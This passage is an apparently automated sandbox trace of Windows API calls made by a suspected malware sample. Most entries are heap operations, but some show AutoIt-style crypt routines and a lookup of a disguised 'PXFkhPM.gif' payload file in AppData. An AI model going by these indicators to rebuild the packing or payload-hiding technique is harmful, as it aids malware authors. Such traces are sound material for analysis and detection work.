cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0236.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0236.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0236.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0236.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0236.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0236.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0236.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0236.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0236.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0236.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0236.946] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0236.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0236.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0236.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0236.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0236.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0236.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0236.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0236.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0236.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0236.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0236.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0236.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0236.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0236.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0236.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0236.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0236.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0236.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0236.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0236.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0236.948] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PXFkhPM.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0236.948] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XFkhPM.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0236.948] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FkhPM.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0236.948] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="khPM.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0236.948] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hPM.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0236.948] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0236.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0236.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0236.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0236.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0236.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0236.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0236.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0236.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0236.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0236.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0236.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0236.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0236.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0236.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0236.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0236.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0236.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0236.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0236.948] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0236.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04498 [0236.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0236.949] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0236.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04498 | out: hHeap=0x970000) returned 1 [0236.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0236.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0236.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0236.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0236.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0236.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0236.949] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0236.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0236.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0236.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0236.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0236.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0236.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0236.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0236.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0236.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0236.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0236.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0236.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0236.950] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0236.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0236.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0236.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0236.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0236.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0236.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0236.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0236.950] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0236.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0236.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0236.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0236.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0236.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0236.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0236.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0236.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0236.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0236.951] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0236.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0236.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0236.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0236.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0236.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0236.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0236.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0236.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0236.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0236.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0236.951] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0236.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0236.951] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0236.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0236.951] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/PXFkhPM.gif", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97044220, ftCreationTime.dwHighDateTime=0x1d5eb99, ftLastAccessTime.dwLowDateTime=0x6b312db0, ftLastAccessTime.dwHighDateTime=0x1d5eb4a, ftLastWriteTime.dwLowDateTime=0x6b312db0, ftLastWriteTime.dwHighDateTime=0x1d5eb4a, nFileSizeHigh=0x0, nFileSizeLow=0x1245c, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="PXFkhPM.gif", cAlternateFileName="")) returned 0xa87250 [0236.952] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0236.952] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0236.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0236.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0236.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0236.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0236.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0236.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0236.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0236.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0236.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0236.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0236.952] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0236.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0236.952] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0236.952] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0236.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0236.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0236.953] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0236.953] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0236.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0236.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0236.953] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0236.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0236.953] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0236.953] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0236.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0236.953] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0236.953] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0236.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0236.953] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0236.953] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0236.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0236.954] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0236.954] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0236.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0236.954] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0236.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0236.955] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0236.955] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0236.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0236.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0236.955] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0236.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0236.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0236.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0236.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0236.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0236.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0236.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0236.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0236.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0236.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0236.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0236.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0236.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0236.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0236.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0236.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0236.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0236.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0236.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0236.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0236.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0236.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0236.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0236.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0236.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0236.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0236.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0236.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0236.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0236.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0236.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0236.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0236.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0236.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0236.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0236.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0236.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0236.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0236.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0236.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0236.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0236.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0236.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0236.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: 